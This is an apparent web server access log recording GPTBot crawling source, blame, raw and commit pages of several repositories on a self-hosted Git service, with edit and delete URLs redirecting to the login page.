[Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" +[17/Feb/2026:17:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 15109] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" +[17/Feb/2026:17:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 14159] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" +[17/Feb/2026:17:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 20553] [Gzip 6.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11098] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:05:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:05:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:05:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:05:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11580] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11585] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:05:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:05:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:17:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:17:05:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:05:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:05:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:05:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:17:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:17:05:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:05:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:17:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 14050] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9789] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 844] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:17:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 844] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:17:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9279] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 21954] [Gzip 10.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11077] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:05:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:05:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11080] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11091] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:17:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11368] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" +[17/Feb/2026:17:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12810] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" +[17/Feb/2026:17:05:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:05:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481677] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" +[17/Feb/2026:17:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481680] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" +[17/Feb/2026:17:06:06 +0000] - 200 200 - GET https 